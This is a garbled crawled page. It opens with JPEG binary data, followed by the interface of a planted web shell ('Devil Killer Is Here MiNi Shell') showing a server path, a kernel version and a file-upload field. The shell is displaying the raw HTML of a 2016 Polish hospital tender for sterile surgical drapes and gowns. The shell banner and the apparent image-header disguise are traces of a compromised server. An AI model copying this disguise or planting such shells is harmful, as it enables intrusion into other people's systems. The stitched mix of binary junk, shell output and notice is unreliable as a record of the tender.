JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160121/14288-N-2016.html

<p class="kh_header"><b>Tarnowskie Góry: DOSTAWA OBŁOŻEŃ STERYLNYCH DO OPERACJI CHIRURGICZNYCH ORAZ FARTUCHÓW CHIRURGICZNYCH STERYLNYCH</b><br>
<b>Numer ogłoszenia: 14288 - 2016; data zamieszczenia: 21.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA OBŁOŻEŃ STERYLNYCH DO OPERACJI CHIRURGICZNYCH ORAZ FARTUCHÓW CHIRURGICZNYCH STERYLNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje sukcesywne dostawy obłożeń sterylnych do operacji chirurgicznych oraz fartuchów chirurgicznych sterylnych do Apteki Szpitalnej. Zamówienie składa się z 8 części, tzw. pakietów, z których każdy stanowi oddzielny przedmiot zamówienia:
    Pakiet Nr 1      Jałowe zestawy obłożeń operacyjnych 1
    Pakiet Nr 2      Jałowe zestawy obłożeń operacyjnych 2
    Pakiet Nr 3      Jałowe zestawy obłożeń operacyjnych 3
    Pakiet Nr 4      Fartuchy chirurgiczne
    Pakiet Nr 5      Jałowe zestawy obłożeń operacyjnych 4
    Pakiet Nr 6      Serwety chirurgiczne
    Pakiet Nr 7      Jałowe zestawy obłożeń operacyjnych 5
    Pakiet Nr 8      Jałowe zestawy obłożeń operacyjnych 6. 

2.  Szczegółowy opis przedmiotu zamówienia, asortyment i ilości znajdują się w załącznikach [D] do SIWZ Formularz cenowy - pakiety 1-8.
3. Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w zakresie danego pakietu.
4. Wykonawca gwarantuje, że przedmiot i warunki realizacji zamówienia w całym okresie wykonywania umowy będą posiadać aktualne świadectwa dopuszczenia do obrotu na rynku polskim zgodne z ustawą o wyrobach medycznych z dnia 20 maja 2010r.  (Dz. U. nr 107 poz. 679 z 20.05.2010r.) oraz z innymi obowiązującymi przepisami prawnymi w tym zakresie. Wszystkie oferowane produkty spełniają właściwe dla każdego z nich wymogi jakościowe co do opakowania i przechowywania oraz posiadają pozwolenie dopuszczające daną serię do obrotu wydawaną każdorazowo przez uprawniony organ. 
5. Termin ważności nie krótszy niż 6 miesięcy od daty dostawy przedmiotu zamówienia do apteki szpitala.
6. Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym, co nie jest odstąpieniem od umowy nawet w części.
7. Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu w stosunku do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do umowy zarówno in plus
jak i in minus, bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy, a Wykonawca wyraża na to zgodę.

II  TERMIN REALIZACJI ZAMÓWIENIA, SPOSÓB DOSTAWY, 
1. Wymagany okres realizacji zamówienia: 12 miesięcy od dnia podpisania umowy lub do wyczerpania wartości umowy w zakresie poszczególnego pakietu.     
2. Sposób dostawy: loco magazyn Apteki Szpitalnej na koszt Wykonawcy w godzinach
 od 7:00 do 14:00.
3. Częściowe dostawy z rozładunkiem odbywać się będą w ilościach wskazanych w zamówieniu
w terminie nie dłuższym niż 3 dni robocze (na CITO w terminie do 48 godzin), po uprzednim zamówieniu drogą faxową lub emailową przez upoważnionego pracownika Zamawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony szczegółowo formularz oferty - część [C] stanowiący załącznik do SIWZ
2. Wypełniony formularz cenowy - część [D] stanowiący załącznik do SIWZ
3. Wzór oświadczeń - część [E.1], [E.2]stanowiący załącznik do SIWZ
4. Wzór oświadczeń - część [F] stanowiący załącznik do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin realizacji dostawy CITO - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2.  Strony dopuszczają zmiany umowy w zakresie:
    a)  zmiany stawki podatku od towarów i usług, gdzie zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
    b) numeru katalogowego produktu (zmiana nr kat nie wymaga aneksowania umowy),
    c) nazwy handlowej produktu przy zachowaniu jego parametrów.
3. Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu objętego umową  
    odpowiednikiem w przypadku:
a) gdy wystąpi przejściowy brak produktu z przyczyn leżacych po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,
b) gdy produkt zostanie wycofany z rynku, zostanie on zastąpiony produktem równoważnym,
c) w przypadku zaprzestania produkcji produkt zastąpiony produktem równoważnym,
    Każda zmiana asortymentu wymaga wcześniejszego pisemnego lub telefonicznego (z potwierdzeniem    
   faksem) uzgodnienia. Osobą upoważnioną do takich uzgodnień lub do akceptacji równoważnego produktu 
   ze strony Zamawiającego jest Kierownik Apteki Szpitalnej. Zmiany w tym zakresie nie wymagają 
   aneksów do umowy.
    d)  przedłożenia przez wykonawcę oferty korzystniejszej dla Zamawiającego 
4. Zmiana, o której mowa w ust. 3 będzie dopuszczalną pod warunkiem, iż odpowiednik będzie tożsamy z przedmiotem zamówienia  i przy cenie nie wyższej niż cena produktu objętego umową.
5.  Wszelkie powyższe zmiany po uprzedniej akceptacji osoby odpowiedzialnej merytorycznie za realizację przedmiotu zamówienia.
6. Strony wspólnie ustalają, że w przypadku zmiany przepisów prawnych skutkujących wzrostem obciążeń publicznoprawnych dla Wykonawcy w związku z zatrudnianiem osób przy wykonywaniu zamówienia
na podstawie umów cywilnoprawnych, w szczególności dotyczących rozszerzenia obowiązku uiszczania przez Wykonawcę składek na ubezpieczenie społeczne od takich umów w wymiarze wyższym
niż dotychczas obowiązujący, kwota wynagrodzenia netto przysługująca Wykonawcy z tytułu realizacji umowy będzie zwiększona o wartość wzrostu tych składek, wymaganych według aktualnie obowiązujących przepisów. Zwaloryzowane wynagrodzenie Wykonawcy będzie obowiązywać od daty wejścia w życie nowych przepisów prawa.
7.  Zmiany umowy z wyjątkiem opisanych w pkt.2b niniejszego paragrafu wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl/zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Wielospecjalistycznym Szpitalu Powiatowym S.A. w Tarnowskich Górach, ul. Pyskowicka 47-51 w Dziale zamówień publicznych - budynek administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2016 godzina 09:30, miejsce: w Wielospecjalistycznym Szpitalu Powiatowym S.A. w Tarnowskich Górach, ul. Pyskowicka 47-51 w Sekretariacie - budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1      Jałowe zestawy obłożeń operacyjnych 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw uniwersalny - wzmocniony                                   Minimalny skład zestawu:              - 1szt serweta na stolik narzędziowy  140 x 190 cm (wzmocnienie  75 x 190 cm)
- 1szt obłożenie stolika Mayo złożone teleskopowo 80 x 145 cm (wzmocnienie  60 x 80 cm)
- 1szt samoprzylepna serweta operacyjna 150 x 240 cm (wzmocnienie  50 x 75 cm)
- 1szt samoprzylepna serweta operacyjna 200 x 175 cm (wzmocnienie 50 x 75 cm)
- 2szt samoprzylepne serwety operacyjne 75 x 90 cm (wzmocnienie  45 x 60 cm)
- 1szt taśma samoprzylepna 10 x 50 cm
- 4szt ręczniki chłonne do osuszania
	zest.	1550
Wymagania																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																															
1. Serwety wykonane z min. dwóch warstw materiału  ( folia polietylenowa + włóknina) o min. gramaturze 54 g/m2, gramatura elementów chłonnych min. 110 g/m2. Materiał musi spełniać wymogi normy EN 13795 cz.1-3.																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																															
2. Do każdej pozycji należy dołączyć kartę techniczną produktu wystawioną przez producenta.  Kartę należy opisać numerem pakietu oraz pozycji.																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																															
3. Opakowania jednostkowe  wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia w postaci naklejki do umieszczenia na karcie pacjenta																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																															
4.Podane wymiary są wymiarami minimalnymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2      Jałowe zestawy obłożeń operacyjnych 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do operacji brzuszno-kroczowych              Minimalny skład zestawu:                                                          - 1szt serweta na stolik narzędziowy min. 140 x 190 cm            (wzmocnienie min.75 x 190 cm)
- 1szt obłożenie stolika Mayo złożone teleskopowo min. 80 x 145 cm (wzmocnienie min.60 x 80 cm)
- 1szt serweta operacyjna z oknem 20 x 30(+/ - 1cm) cm w kształcie nerki  9x12 cm owalne o wymiarze serwety 230x250cm wzmocniona w obszarze 60x120cm i 85x50cm
- 2szt ręczniki chłonne

	zest.	300
Wymagania	
1. Serwety wykonane z min. dwóch warstw materiału  ( folia polietylenowa + włóknina) o min. gramaturze 54 g/m2, gramatura elementów chłonnych min. 110 g/m2. Materiał musi spełniać wymogi normy EN 13795 cz.1-3.	
2. Do każdej pozycji należy dołączyć kartę techniczną produktu wystawioną przez producenta.  Kartę należy opisać numerem pakietu oraz pozycji.	
3. Opakowania jednostkowe  wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia w postaci naklejki do umieszczenia na karcie pacjenta	
4.Podane wymiary są wymiarami minimalnymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 3      Jałowe zestawy obłożeń operacyjnych 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zestaw do zabiegów laryngologicznych
1. Serweta samoprzylepna 150 x 245 cm z klejem min. 100 cm umieszczonym na krótszym boku serwety; serweta składająca się z min. 3 warstw o gramaturze min 54g/mkw. - 1 szt. Materiał musi spełniać wymogi normy EN 13795 cz.1-3.  
2. Serweta-turban 100 x 100 cm składająca się z min. 3 warstw o gramaturze min 54 g/mkw - 1 szt.
3. Obłożenie na stolik Mayo 80 x 145 cm, składane teleskopowo - 1 szt. ( wzmocnienie 60 x 80cm)
4. Ręcznik chłonne 4 szt.
5. Uchwyt typu Velcro 2 x 23 cm - 1 szt.
6. Kieszeń na narzędzia samoprzylepna jednokomorowa 30 x 32 cm, wykonana z PE - 1 szt.
7. Serweta na stolik narzędziowy 200 x 150 cm (owinięcie zestawu)

	zest.	260
Wymagania	
1. Serwety wykonane z min. trzech warstw materiału  ( PP+ PE+ włóknina wiskozowa) o min. gramaturze 54 g/m2. Materiał musi spełniać wymogi normy EN 13795 cz.1-3.w zakresie podwyższonych wartości.	
2. Do każdej pozycji należy dołączyć kartę techniczną produktu wystawioną przez producenta.  Kartę należy opisać numerem pakietu oraz pozycji.	
